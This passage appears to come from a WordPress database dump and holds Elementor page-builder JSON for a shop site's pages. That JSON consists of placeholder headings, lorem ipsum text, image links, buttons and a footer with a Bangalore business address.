#1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8504,1488,'_elementor_page_assets','a:0:{}'),(8515,1490,'_elementor_edit_mode','builder'),(8516,1490,'_elementor_template_type','wp-page'),(8517,1490,'_elementor_version','3.7.7'),(8518,1490,'_wp_page_template','elementor_canvas'),(8519,1490,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8520,1490,'_elementor_page_assets','a:0:{}'),(8522,1491,'_elementor_edit_mode','builder'),(8523,1491,'_elementor_template_type','wp-page'),(8524,1491,'_elementor_version','3.7.7'),(8525,1491,'_wp_page_template','elementor_canvas'),(8526,1491,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_